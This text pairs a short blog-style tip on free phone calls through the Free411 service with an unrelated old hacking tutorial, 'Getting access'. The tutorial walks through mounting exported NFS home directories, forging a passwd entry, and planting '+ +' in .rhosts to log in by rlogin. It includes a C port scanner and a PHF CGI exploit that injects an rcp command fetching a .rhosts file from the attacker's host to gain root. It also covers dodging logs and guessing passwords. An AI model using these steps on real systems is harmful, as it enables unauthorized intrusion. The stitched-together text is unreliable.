You can now make free calls from your pc to any mobile in the world. All you need is a mic with ear phones, a decent internet connection and Yahoo Messenger or Skype Installed.I’m now using this free call method and the great thing is that, this trick can be used to make unlimited call to mobiles all over the world and not limited to United states. It even works to make free local mobile calls in India.

So how do we make a call from pc to mobile phone for free?

Install Yahoo messenger or Skype. In case you don’t have it Google it and download the latest version.

Sign into your yahoo messenger or Skype using your yahoo id and password. Configure your microphone and headset if you have installed a fresh yahoo or skype software
Inside your Yahoo messenger dial                    and press enter(as shown in figure).

Now a small window pops up like the one shown below.

An operator greets you with a recorded welcome message along with an advertisement and asks you to select one of the Free411 service. Just hear the services options until they say the last one as “Free Call”. When you hear this, don’t press any number on your keyboard and instead SAY “Free call” loudly on your microphone connected to your PC.
After this voice message is detected by their system, they will run a short advertisement of their sponsor and make sure you don’t press any number at this time.
WAIT UNTIL YOU HEAR A BEEP SOUND after the following message “Please dial the phone number country code first, don’t forget to dial 1 for north America”
After you hear this message ,immediately dial the destination number of your choice along with the country code.(e.g. for north America it’s 1 and for India it’s 91)

Your call will get connected and you can talk for 7 minutes continuous for free. When it gets disconnected, repeat the same procedure again. You can make multiple and unlimited calls with this service.
It was never easy to make a free international call like this before.
So what’s the catch?
FREE411 service toll-free number is based in USA. This company gets paid for the advertisements from sponsors.
Are there any limits on the number of call which we can make?
No. There is no limit on the number of free calls which can be made through this system.
So enjoy this trick to make free international and local calls and make sure you don’t abuse the system.

Getting access.

_______



Well folks, there are several methods to get access to a site.

I'll try to explain the most used ones.

The first thing I do is see if the system has an export list:



mysite:~>/usr/sbin/showmount -e Slave.site.com

RPC: Program not registered.



If it gives a message like this one, then it's time to search another way

in.

What I was trying to do was to exploit an old security problem by most

SUN OS's that could allow an remote attacker to add a .rhosts to a users

home directory... (That was possible if the site had mounted their home

directory.

Let's see what happens...





mysite:~>/usr/sbin/showmount -e victim1.site.com

/usr victim2.site.com

/home (everyone)

/cdrom (everyone)

mysite:~>mkdir /tmp/mount

mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/

mysite:~>ls -sal /tmp/mount

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/



Well, we wanna hack into rapper's home.

mysite:~>id

uid=0 euid=0

mysite:~>whoami

root

mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd



We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might

forget it on the remote server...



mysite:~>su - rapper

Welcome to rapper's user.

mysite:~>ls -lsa /tmp/mount/

total 9

1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./

1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../

1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/

1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/

1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/

1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/

1 -rw------- 1 root root 242 Mar 9 1997 sudoers

1 drwx------ 3 test 100 1024 Oct 8 21:05 test/

1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/



So we own this guy's home directory...



mysite:~>echo "+ +" > rapper/.rhosts

mysite:~>cd /

mysite:~>rlogin victim1.site.com

Welcome to Slave.Site.Com.

SunOs ver....(crap).

victim1:~$



This is the first method...

Another method could be to see if the site has an open 80 port. That would

mean that the site has a web page.

(And that's very bad, 'cuz it usually it's vulnerable).

Below I include the source of a scanner that helped me when NMAP wasn't written.

(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).

NMAP is a scanner that does even stealth scanning, so lots of systems won't

record it.



/* -*-C-*- tcpprobe.c */

/* tcpprobe - report on which tcp ports accept connections */

/* IO ERROR, error@axs.net, Sep 15, 1995 */



#include <stdio.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <errno.h>

#include <netdb.h>

#include <signal.h>



int main(int argc, char **argv)

{

int probeport = 0;

struct hostent *host;

int err, i, net;

struct sockaddr_in sa;



if (argc != 2) {

printf("Usage: %s hostname\n", argv[0]);

exit(1);

}



for (i = 1; i < 1024; i++) {

strncpy((char *)&sa, "", sizeof sa);

sa.sin_family = AF_INET;

if (isdigit(*argv[1]))

sa.sin_addr.s_addr = inet_addr(argv[1]);

else if ((host = gethostbyname(argv[1])) != 0)

strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);

else {

herror(argv[1]);

exit(2);

}

sa.sin_port = htons(i);

net = socket(AF_INET, SOCK_STREAM, 0);

if (net < 0) {

perror("\nsocket");

exit(2);

}

err = connect(net, (struct sockaddr *) &sa, sizeof sa);

if (err < 0) {

printf("%s %-5d %s\r", argv[1], i, strerror(errno));

fflush(stdout);

} else {

printf("%s %-5d accepted. \n", argv[1], i);

if (shutdown(net, 2) < 0) {

perror("\nshutdown");

exit(2);

}

}

close(net);

}

printf(" \r");

fflush(stdout);

return (0);

}



Well, now be very carefull with the below exploits, because they usually get

logged.

Besides, if you really wanna get a source file from /cgi-bin/ use this

sintax : lynx http://www.victim1.com//cgi-bin/finger

If you don't wanna do that, then do a :



mysite:~>echo "+ +" > /tmp/rhosts



mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+

/root/.rhosts" | nc -v - 20 victim1.site.com 80



then

mysite:~>rlogin -l root victim1.site.com

Welcome to Victim1.Site.Com.

victim1:~#



Or, maybe, just try to find out usernames and passwords...

The usual users are "test", "guest", and maybe the owner of the site...

I usually don't do such things, but you can...



Or if the site is really old, use that (quote site exec) old bug for

wu.ftpd.

There are a lot of other exploits, like the remote exploits (innd, imap2,

pop3, etc...) that you can find at rootshell.connectnet.com or at

dhp.com/~fyodor.



Enough about this topic. (besides, if you can finger the site, you can

figgure out usernames and maybe by guessing passwords (sigh!) you could get

access to the site).